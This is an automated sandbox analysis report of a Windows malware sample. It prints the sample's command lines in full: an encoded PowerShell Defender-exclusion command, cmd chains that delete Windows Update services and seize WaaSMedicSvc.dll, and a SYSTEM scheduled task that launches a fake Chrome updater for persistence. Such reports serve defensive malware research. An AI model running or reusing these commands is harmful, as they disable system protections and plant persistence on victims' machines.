Analysis
-
max time kernel
44s -
max time network
49s -
platform
windows7_x64 -
resource
win7-20220715-en -
resource tags
arch:x64 arch:x86 image:win7-20220715-en locale:en-us os:windows7-x64 system -
submitted
03-08-2022 10:15
Behavioral task
behavioral1
Sample
1e124bfe454512671d65f854c0ccf3ae92b73ae084050db439e709ac63129025.exe
Resource
win7-20220715-en
General
-
Target
1e124bfe454512671d65f854c0ccf3ae92b73ae084050db439e709ac63129025.exe
-
Size
7.1MB
-
MD5
322cf2f6a67420e4eb53f29263a639ba
-
SHA1
bc91f56c260ff4484f7fb0d33a3d351d3d812781
-
SHA256
1e124bfe454512671d65f854c0ccf3ae92b73ae084050db439e709ac63129025
-
SHA512
3e58b83f26950059901ad1cbb20a06351b7a815d17a3e65a0a84061b7d0d9af588a2685786c28642b1bb76575c81b272d10a1b1dede515b643b27ea52deadcc7
Malware Config
Signatures
-
Modifies security service 2 TTPs 2 IoCs
Processes:
reg.exe
description | ioc | process
Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wuauserv\Parameters | reg.exe
Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wuauserv\Security | reg.exe
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs
Processes:
1e124bfe454512671d65f854c0ccf3ae92b73ae084050db439e709ac63129025.exe
description | ioc | process
Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | 1e124bfe454512671d65f854c0ccf3ae92b73ae084050db439e709ac63129025.exe
-
Drops file in Drivers directory 1 IoCs
Processes:
conhost.exe
description | ioc | process
File opened for modification | C:\Windows\system32\drivers\etc\hosts | conhost.exe
-
Possible privilege escalation attempt 2 IoCs
Processes:
takeown.exe, icacls.exe
pid | process
1628 | takeown.exe
520 | icacls.exe
-
Stops running service(s) 3 TTPs
-
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
1e124bfe454512671d65f854c0ccf3ae92b73ae084050db439e709ac63129025.exe
description | ioc | process
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | 1e124bfe454512671d65f854c0ccf3ae92b73ae084050db439e709ac63129025.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | 1e124bfe454512671d65f854c0ccf3ae92b73ae084050db439e709ac63129025.exe
-
Modifies file permissions 1 TTPs 2 IoCs
Processes:
takeown.exe, icacls.exe
pid | process
1628 | takeown.exe
520 | icacls.exe
-
Processes:
resource | yara_rule
behavioral1/memory/736-54-0x0000000000400000-0x000000000106F000-memory.dmp | themida
behavioral1/memory/736-55-0x0000000000400000-0x000000000106F000-memory.dmp | themida
-
Processes:
1e124bfe454512671d65f854c0ccf3ae92b73ae084050db439e709ac63129025.exe
description | ioc | process
Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | 1e124bfe454512671d65f854c0ccf3ae92b73ae084050db439e709ac63129025.exe
-
Drops file in System32 directory 1 IoCs
Processes:
powershell.exe
description | ioc | process
File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | powershell.exe
-
Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
Processes:
1e124bfe454512671d65f854c0ccf3ae92b73ae084050db439e709ac63129025.exe
pid | process
736 | 1e124bfe454512671d65f854c0ccf3ae92b73ae084050db439e709ac63129025.exe
-
Drops file in Program Files directory 2 IoCs
Processes:
conhost.exe
description | ioc | process
File created | C:\Program Files\Google\Chrome\updater.exe | conhost.exe
File opened for modification | C:\Program Files\Google\Chrome\updater.exe | conhost.exe
-
Launches sc.exe 5 IoCs
Sc.exe is a Windows utility to control services on the system.
Processes:
sc.exe, sc.exe, sc.exe, sc.exe, sc.exe
pid | process
1384 | sc.exe
824 | sc.exe
1636 | sc.exe
1516 | sc.exe
1648 | sc.exe
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Modifies registry key 1 TTPs 9 IoCs
Processes:
reg.exe, reg.exe, reg.exe, reg.exe, reg.exe, reg.exe, reg.exe, reg.exe, reg.exe
pid | process
2032 | reg.exe
2044 | reg.exe
568 | reg.exe
968 | reg.exe
332 | reg.exe
1312 | reg.exe
1456 | reg.exe
1944 | reg.exe
2020 | reg.exe
-
Suspicious behavior: EnumeratesProcesses 2 IoCs
Processes:
powershell.exe, conhost.exe
pid | process
1932 | powershell.exe
864 | conhost.exe
-
Suspicious use of AdjustPrivilegeToken 7 IoCs
Processes:
powershell.exe, powercfg.exe, powercfg.exe, conhost.exe, powercfg.exe, powercfg.exe, takeown.exe
description | pid | process
Token: SeDebugPrivilege | 1932 | powershell.exe
Token: SeShutdownPrivilege | 1788 | powercfg.exe
Token: SeShutdownPrivilege | 1096 | powercfg.exe
Token: SeDebugPrivilege | 864 | conhost.exe
Token: SeShutdownPrivilege | 2028 | powercfg.exe
Token: SeShutdownPrivilege | 1124 | powercfg.exe
Token: SeTakeOwnershipPrivilege | 1628 | takeown.exe
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\1e124bfe454512671d65f854c0ccf3ae92b73ae084050db439e709ac63129025.exe"C:\Users\Admin\AppData\Local\Temp\1e124bfe454512671d65f854c0ccf3ae92b73ae084050db439e709ac63129025.exe"1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\1e124bfe454512671d65f854c0ccf3ae92b73ae084050db439e709ac63129025.exe"2⤵
- Drops file in Drivers directory
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGUAdAB2ACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAegBhAHgAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAbgBmACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGIAZwBuACMAPgA="3⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\sc.exesc stop UsoSvc4⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop WaaSMedicSvc4⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop wuauserv4⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop bits4⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop dosvc4⤵
- Launches sc.exe
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f4⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f4⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f4⤵
- Modifies security service
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f4⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f4⤵
- Modifies registry key
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\WaaSMedicSvc.dll4⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q4⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f4⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f4⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f4⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f4⤵
- Modifies registry key
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE4⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE4⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE4⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE4⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE4⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE4⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE4⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 03⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-ac 04⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-dc 04⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-ac 04⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-dc 04⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "GoogleUpdateTaskMachineQC" /tr "\"C:\Program Files\Google\Chrome\updater.exe\""3⤵
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /ru "System" /tn "GoogleUpdateTaskMachineQC" /tr "\"C:\Program Files\Google\Chrome\updater.exe\""4⤵
- Creates scheduled task(s)
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /run /tn "GoogleUpdateTaskMachineQC"3⤵
-
C:\Windows\system32\schtasks.exeschtasks /run /tn "GoogleUpdateTaskMachineQC"4⤵
Network
MITRE ATT&CK Matrix ATT&CK v6